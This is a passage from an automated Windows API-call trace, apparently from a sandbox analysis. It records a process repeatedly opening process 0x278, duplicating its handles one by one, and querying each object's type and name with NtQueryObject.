lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.023] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.023] CloseHandle (hObject=0x1b8) returned 1 [0114.023] CloseHandle (hObject=0x198) returned 1 [0114.023] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.023] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.023] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.024] CloseHandle (hObject=0x1b8) returned 1 [0114.024] CloseHandle (hObject=0x198) returned 1 [0114.024] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.024] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.024] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.025] CloseHandle (hObject=0x1b8) returned 1 [0114.025] CloseHandle (hObject=0x198) returned 1 [0114.025] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.025] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.025] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.025] CloseHandle (hObject=0x1b8) returned 1 [0114.025] CloseHandle (hObject=0x198) returned 1 [0114.025] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.025] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.026] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.026] CloseHandle (hObject=0x1b8) returned 1 [0114.026] CloseHandle (hObject=0x198) returned 1 [0114.026] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.026] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.026] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.026] CloseHandle (hObject=0x1b8) returned 1 [0114.026] CloseHandle (hObject=0x198) returned 1 [0114.027] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.027] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.027] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.027] CloseHandle (hObject=0x1b8) returned 1 [0114.027] CloseHandle (hObject=0x198) returned 1 [0114.027] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.027] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.027] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.027] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.027] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.028] CloseHandle (hObject=0x1b8) returned 1 [0114.028] CloseHandle (hObject=0x198) returned 1 [0114.028] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.028] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.028] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.028] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.028] CloseHandle (hObject=0x1b8) returned 1 [0114.028] CloseHandle (hObject=0x198) returned 1 [0114.028] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.028] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.029] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.029] CloseHandle (hObject=0x1b8) returned 1 [0114.029] CloseHandle (hObject=0x198) returned 1 [0114.029] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.029] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.029] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.029] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.029] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.030] CloseHandle (hObject=0x1b8) returned 1 [0114.030] CloseHandle (hObject=0x198) returned 1 [0114.030] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.030] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x500, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.030] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.030] CloseHandle (hObject=0x1b8) returned 1 [0114.030] CloseHandle (hObject=0x198) returned 1 [0114.030] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.030] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x504, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.031] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.031] CloseHandle (hObject=0x1b8) returned 1 [0114.031] CloseHandle (hObject=0x198) returned 1 [0114.031] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.031] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x508, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.031] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.031] CloseHandle (hObject=0x1b8) returned 1 [0114.031] CloseHandle (hObject=0x198) returned 1 [0114.032] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.032] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.034] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.035] CloseHandle (hObject=0x1b8) returned 1 [0114.035] CloseHandle (hObject=0x198) returned 1 [0114.035] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.035] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x510, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.035] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.035] CloseHandle (hObject=0x1b8) returned 1 [0114.035] CloseHandle (hObject=0x198) returned 1 [0114.035] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.036] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x514, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.036] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.036] CloseHandle (hObject=0x1b8) returned 1 [0114.036] CloseHandle (hObject=0x198) returned 1 [0114.036] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.036] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x518, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.036] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.037] CloseHandle (hObject=0x1b8) returned 1 [0114.037] CloseHandle (hObject=0x198) returned 1 [0114.037] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.037] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.037] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.037] CloseHandle (hObject=0x1b8) returned 1 [0114.037] CloseHandle (hObject=0x198) returned 1 [0114.037] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.037] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x520, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.038] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.038] CloseHandle (hObject=0x1b8) returned 1 [0114.038] CloseHandle (hObject=0x198) returned 1 [0114.038] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.038] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x524, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.038] CloseHandle (hObject=0x198) returned 1 [0114.038] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.038] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x528, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.039] CloseHandle (hObject=0x198) returned 1 [0114.039] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.039] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.039] CloseHandle (hObject=0x198) returned 1 [0114.039] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.039] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x530, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.039] CloseHandle (hObject=0x198) returned 1 [0114.039] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.039] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x534, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.040] CloseHandle (hObject=0x198) returned 1 [0114.040] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.040] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x538, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.040] CloseHandle (hObject=0x198) returned 1 [0114.040] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.040] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.040] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.040] CloseHandle (hObject=0x1b8) returned 1 [0114.041] CloseHandle (hObject=0x198) returned 1 [0114.041] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.041] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x540, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.041] CloseHandle (hObject=0x198) returned 1 [0114.041] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.041] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x544, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.041] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.041] CloseHandle (hObject=0x1b8) returned 1 [0114.041] CloseHandle (hObject=0x198) returned 1 [0114.042] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.042] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x548, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.042] CloseHandle (hObject=0x198) returned 1 [0114.042] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.042] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x54c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.042] CloseHandle (hObject=0x198) returned 1 [0114.042] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.042] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x550, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.043] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.043] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.043] CloseHandle (hObject=0x1b8) returned 1 [0114.043] CloseHandle (hObject=0x198) returned 1 [0114.043] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.043] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x554, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.043] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.043] CloseHandle (hObject=0x1b8) returned 1 [0114.044] CloseHandle (hObject=0x198) returned 1 [0114.044] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.044] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x558, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.044] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.044] CloseHandle (hObject=0x1b8) returned 1 [0114.044] CloseHandle (hObject=0x198) returned 1 [0114.044] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.044] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x55c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.045] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.045] CloseHandle (hObject=0x1b8) returned 1 [0114.045] CloseHandle (hObject=0x198) returned 1 [0114.045] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.045] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x560, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.045] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.045] CloseHandle (hObject=0x1b8) returned 1 [0114.046] CloseHandle (hObject=0x198) returned 1 [0114.046] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.046] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x564, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.046] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.046] CloseHandle (hObject=0x1b8) returned 1 [0114.046] CloseHandle (hObject=0x198) returned 1 [0114.046] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.046] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x568, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.046] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.047] CloseHandle (hObject=0x1b8) returned 1 [0114.047] CloseHandle (hObject=0x198) returned 1 [0114.047] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.047] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x56c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.047] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.047] CloseHandle (hObject=0x1b8) returned 1 [0114.047] CloseHandle (hObject=0x198) returned 1 [0114.047] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.047] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x570, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.047] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.048] CloseHandle (hObject=0x1b8) returned 1 [0114.048] CloseHandle (hObject=0x198) returned 1 [0114.048] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.048] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x574, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.048] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.048] CloseHandle (hObject=0x1b8) returned 1 [0114.048] CloseHandle (hObject=0x198) returned 1 [0114.048] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.049] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x578, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.049] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.049] CloseHandle (hObject=0x1b8) returned 1 [0114.049] CloseHandle (hObject=0x198) returned 1 [0114.049] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.049] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x57c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, 